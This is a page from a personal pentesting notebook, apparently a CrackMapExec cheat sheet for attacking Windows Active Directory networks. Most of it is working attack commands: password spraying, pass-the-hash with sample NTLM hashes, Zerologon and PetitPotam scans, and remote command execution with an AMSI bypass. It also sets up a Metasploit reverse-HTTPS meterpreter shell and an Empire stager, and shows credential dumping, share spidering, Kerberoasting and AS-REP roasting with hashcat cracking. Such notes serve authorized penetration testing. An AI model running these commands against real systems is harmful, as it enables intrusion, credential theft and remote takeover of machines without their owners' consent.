☕
Brinkles Pentesting Notebook
  • Introduction
    • My Journey to Pentesting
    • Twitter
    • Github
  • Certification Reviews
    • OSEP Review
    • CISSP Review
    • OSCP Review
    • RTJC Review
    • RTAC Review
    • CEH Review
    • CRTO Review
    • PNPT Review
    • eWPT Review
    • eJPTv1 Review
    • CCNP Security Review
    • CCNA Review
    • CompTIA Net +, A+ Review
  • C2 and Payloads
    • Sliver C2
    • Cobalt Strike
      • BOFs and Aggressor Scripts
        • Situational Awareness BOF
        • HOLLOW BOF
        • DLL_Version_Enumeration_BOF
        • InlineExecute-Assembly BOF
        • BOF.NET
        • C2-Tool-Collection BOFs
        • Inline-Execute-PE
      • Payloads
  • Tools
    • Internal Tools
      • BloodHound
      • Certi
      • Coercer
      • CrackMapExec
      • DCSync
      • DFSCoerce
      • DonPAPI
      • WMIEXEC
      • Kerberoasting
      • Lsassy
      • mitm6
      • Pcredz
      • PowerSploit
      • PrivExchange
      • Responder / RunFinger
      • Rubeus
      • Seatbelt
      • Seth
    • Web App Pentesting
      • Payload All The Things
        • Directory traversal
          • Deep Traversal
          • More Directory Traversal Payloads
        • SAML Injection
        • XXE - XML External Entity
        • XSS - Cross Site Scripting
        • XSLT Injection
        • XPATH injection
        • Upload Insecure Files
        • SQL injection
          • MSSQL Injection
          • MYSQL Injection
          • Oracle SQL Injection
          • PostgreSQL injection
          • SQLite Injection
        • Server Side Templates Injections
        • Server-Side Request Forgery
          • Payloads Included in Server-Side Request Forgery
        • Request Smuggling
        • OAuth
        • NoSQL injection
        • LDAP injection
        • Kubernetes
        • JSON Web Token
        • HTTP Parameter Pollution
        • GraphQL injection
        • CORS Misconfiguration
        • CRLF
        • Cross-Site Request Forgery
        • CSV Injection (Formula Injection)
        • File Inclusion
          • PHPINFOlfi.py
          • uploadlfi.py
  • Network Security
    • DMVPN GRE NHRP IPsec Profiles
    • Flex VPNs
    • GET VPN with Key Server
    • IKE Site to Site w/ IPSec
    • Point to Point GRE over IPSec
    • Remote Access VPN
    • Helpful Cisco Firewall CLI Commands
Powered by GitBook
On this page
  • Installation
  • Using Credentials
  • Using Kerberos
  • Using Modules
  • Using Database
  • SMB - Scanning for Vulns
  • Enumeration
  • Command Execution
  • Getting Shells
  • Spidering Shares
  • Sending files to Remote Targets
  • Dumping Creds
  • CME when LAPS is installed on the Domain
  • Checking if the Service Spooler is running
  • LDAP Authentication
  • WINRM Protocol
  • MSSQL
  • SSH
  • RDP
  1. Tools
  2. Internal Tools

CrackMapExec

PreviousCoercerNextDCSync

Last updated 2 years ago

Installation

Run the mass tools script and it will install it. https://mpgn.gitbook.io/crackmapexec/

Using Credentials

Every protocol supports using credentials in one form or another.

--crackmapexec <target(s)> -u username -p password

--crackmapexec <target(s)> -u username -p 'Admin!123@'

From Database:

--crackmapexec <target(s)> -id <cred ID(s)>

Multi-domain Env:

--crackmapexec <target(s)> -p FILE -u password

Where file is...

DOMAIN1\user

DOMAIN2\user

Brute Force / Password Spraying:

--crackmapexec <target(s)> -u username1 -p password1 password2

--crackmapexec <target(s)> -u username1 username2 -p password1

--crackmapexec <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

--crackmapexec <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

Password Spraying without BruteForce:

--crackmapexec <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce

--crackmapexec <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords --no-bruteforce

Using Kerberos

CME does support Kerberos authentication, use KRB5CCNAME env name to specify the ticket. When using the option --kerberos, you need to specify the same hostname (FQDN) as the one from the kerberos ticket

--export KRB5CCNAME=/home/bonclay/impacket/bonclay.ccache

--sudo cme smb zoro.gold.local --kerberos -x whoami

--export KRB5CCNAME=/home/bonclay/impacket/administrator.ccache

--cme smb zoro.gold.local --kerberos

--sudo cme smb zoro.gold.local --kerberos -x whoami

Using Modules

Using Database

SMB - Scanning for Vulns

When you start your internal pentest, this is the first modules you should try:

Zerologon:

--crackmapexec smb <ip> -u '' -p '' -M zerologon

PetitPotam:

--crackmapexec smb -u '' -p '' -M petitpotam

noPAC:

--crackmapexec smb -u 'user' -p 'pass' -M nopac

Enumeration

Returns a list of live hosts:

-- cme smb 192.168.1.0/24

Checks for Null Sessions

--cme smb 10.10.10.161 -u '' -p ''

--cme smb 10.10.10.161 --pass-pol

--cme smb 10.10.10.161 --users

--cme smb 10.10.10.161 --groups

You can also use...

--smbclient -N -U "" -L \10.10.10.161

--rpcclient -N -U "" -L \10.10.10.161

--rpcclient $> enumdomusers

Pulling Password Policy:

--cme smb 10.10.10.161 -u '' -p '' --pass-pol

Anonymous logon: (make sure password is empty)

--cme smb 10.10.10.178 -u 'a' -p ''

You can also use...

--smbclient -N -L \10.10.10.178

--rpcclient -N -L 10.10.10.178

Enumerate active sessions on remote target:

--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions

Enumerate permissions on all shares:

--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares

Enumerate disks on remote target:

--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disks

Enumerate logged on users:

--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users

Enumerate domain users:

--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users

Enumerate users by bruteforcing the RID on the remote target:

--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute

Enumerate domain groups:

--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups

Enumerate local groups on the remote target:

--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups

Enumerates host with SMB signing not required: Maps the network of live hosts and saves a list of only the hosts that don't require SMB signing.

--cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt

--cat relaylistOutputFilename.txt

Checking domain credentials against a subnet:

--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'

After obtaining credentials such as Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c::: you can use both the full hash or just the nt hash (second half)

--cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'

--cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'

--cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'

--cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'

Checking local credentials:

--cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth

--cme smb 192.168.1.0/24 -u '' -p '' --local-auth

--cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth

--cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth

--cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth

--cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth

Command Execution

CME has three different command execution methods:

  1. wmiexec executes commands via WMI

  2. atexec executes commands by scheduling a task with windows task scheduler

  3. smbexec executes commands by creating and running a service

By default CME will fail over to a different execution method if one fails. It attempts to execute commands in the following order:

  1. wmiexec

  2. atexec

  3. smbexec

If you want to force CME to use only one execution method you can specify which one using the --exec-method flag. In the following example, we try to execute whoami on the target using the -x flag:

--crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami

You can also directly execute PowerShell commands using the -X flag:

--crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'

Bypass AMSI:

--crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --amsi-bypass /path/payload

For example:

--poetry run crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --smb-server-port 1337

Will not work, blocked by AV

--poetry run crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --smb-server-port 1337 --amsi-bypass /tmp/amsi

Will worked, command executed.

Getting Shells

We can use the empire_exec module to execute an Empire Agent's initial stager. In the background, the module connects to Empire's RESTful API, generates a launcher for the specified listener and executes it.

First setup the rest API:

Then just run the empire_exec module and specify the listener name:

--crackmapexec 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test

Meterpreter: We can use the metinject module launch a meterpreter using Invoke-MetasploitPayload Invoke-MetasploitPayload.ps1 script. On your Metasploit instance, run the following commands

use exploit/multi/script/web_delivery

The SRVHOST and SRVPORT variables are used for running the webserver to host the script

set SRVHOST 10.211.55

set SRVPORT 8443

The target variable determines what type of script we're using. 2 is for PowerShell

set target 2

Pick your payload. In this case, we'll use a reverse https meterpreter payload

set payload windows/meterpreter/reverse_https

set LHOST 10.211.55

set LPORT 443

run

Once run, the web_delivery module will spin up the webserver to host the script and reverse listener for our meterpreter session. Then just run the met_inject module and specify the LHOST and LPORT values:

--crackmapexec 192.168.10.0/24 -u username -p password -M met_inject -o SRVHOST=192.168.10.3 SRVPORT=8443 RAND=eYEssEwv2D SSL=http

Spidering Shares

The module spider_plus allows you to list and dump all files from all readable shares

List all readable files:

--crackmapexec smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus

Dump all files (-o READ_ONLY=false all files will be copied on the host):

--crackmapexec smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o READ_ONLY=false

Sending files to Remote Targets

--cme smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \Windows\Temp\whoami.txt

Grab a file fromt he remote target:

--cme smb 172.16.251.152 -u user -p pass --get-file \Windows\Temp\whoami.txt /tmp/whoami.txt

Dumping Creds

CME when LAPS is installed on the Domain

If LAPS is used inside the domain, is can be hard to use CrackMapExec to execute a command on every computer on the domain. Therefore, a new core option has been added --laps ! If you have compromised an accout that can read LAPS password you can use CrackMapExec like this

--crackmapexec smb -u user-can-read-laps -p pass --laps

--crackmapexec smb -u user-can-read-laps -p pass --laps --sam

Checking if the Service Spooler is running

--crackmapexec smb -u 'user' -p 'pass' -M spooler

Checking if service webdav is running:

--crackmapexec smb -u 'user' -p 'pass' -M webdav

LDAP Authentication

Testing creds:

--cme ldap 192.168.1.0/24 -u user -p password

--cme ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B

(domain name resolution is required)

ASREP Roast: You can retrieve the Kerberos 5 AS-REP etype 23 hash of users without Kerberos pre-authentication required if you have a list of users on the domain The ASREPRoast attack looks for users without Kerberos pre-authentication required. That means that anyone can send an AS_REQ request to the KDC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline. More detail in Kerberos theory.

--cme ldap 192.168.0.104 -u harry -p '' --asreproast output.txt

Using a wordlist, you can find wordlists of username here

--cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt

With authentication..... If you have one valid credential on the domain, you can retrieve all the users and hashs where the Kerberos pre-authentication is not required

--cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt

Use option kdcHost when the domain name resolution fail

--cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt --kdcHost domain_name

To crack hashes on the file output.txt with hashcat use the following options:

--hashcat -m18200 output.txt wordlist

Kerberoasting: You can retrieve the Kerberos 5 TGS-REP etype 23 hash using Kerberoasting technique The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets is encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline. More detail in Kerberos theory. To perfom this attack, you need an account on the domain

--cme ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt

--hashcat -m13100 output.txt wordlist.txt

Unconstrained Delegation: CrackMapExec allows you to retrieve the list of all computers et users with the flag TRUSTED_FOR_DELEGATION

--cme ldap 192.168.0.104 -u harry -p pass --trusted-for-delegation

Admin Count: adminCount Indicates that a given object has had its ACLs changed to a more secure value by the system because it was a member of one of the administrative groups (directly or transitively).

--cme ldap 192.168.255.131 -u adm -p pass --admin-count

Exploit ESC8 (adcs): List all PKI enrollment Server:

--crackmapexec run ldap -u user -p pass -M adcs

List all certificates inside a PKI:

--crackmapexec run ldap -u user -p pass -M adcs -o SERVER=xxxx

WINRM Protocol

Password spraying (without Brute force)

--cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Testing creds:

--cme winrm 192.168.1.0/24 -u user -p password

If the SMB port is closed you can also use the flag -d DOMAIN to avoid an SMB connection

--cme winrm 192.168.1.0/24 -u user -p password -d DOMAIN

Command Execution:

--cme winrm 192.168.255.131 -u user -p 'password' -X whoami

Using CrackMapExec when LAPS installed on the domain If LAPS is used inside the domain, is can be hard to use CrackMapExec to execute a command on every computer on the domain. Therefore, a new core option has been added --laps ! If you have compromised an accout that can read LAPS password you can use CrackMapExec like this

--crackmapexec winrm -u user-can-read-laps -p pass --laps

MSSQL

Password spraying w/o brute

--cme mssql 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Windows auth: With SMB port open...

--cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'

With SMB port closed, add the domain flag

--cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d HTB

Local auth use the --local-auth command.

--cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth

Specify ports..

--cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --port 1434

MSSQL Privesc:

--cme mssql -u user -p password -M mssql_priv

Execute MSSQL commands:

--cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'

Windows commands:

--cme mssql 10.10.10.59 -u sa -p 'GWE3V65#6KFH93@4GWTG2G' --local-auth -x whoami

SSH

Password spraying..

--cme ssh 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Testing Creds:

--cme ssh 192.168.1.0/24 -u user -p password

--cme http 192.168.1.0/24 --port 2222

Command execution:

--cme ssh 127.0.0.1 -u user -p password -x whoami

RDP

Password spraying...

--poetry run crackmapexec rdp 192.168.1.0/24 -u user -p password

--poetry run crackmapexec rdp 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Page cover image
GitHub - Porchetta-Industries/CrackMapExec: A swiss army knife for pentesting networksGitHub
Logo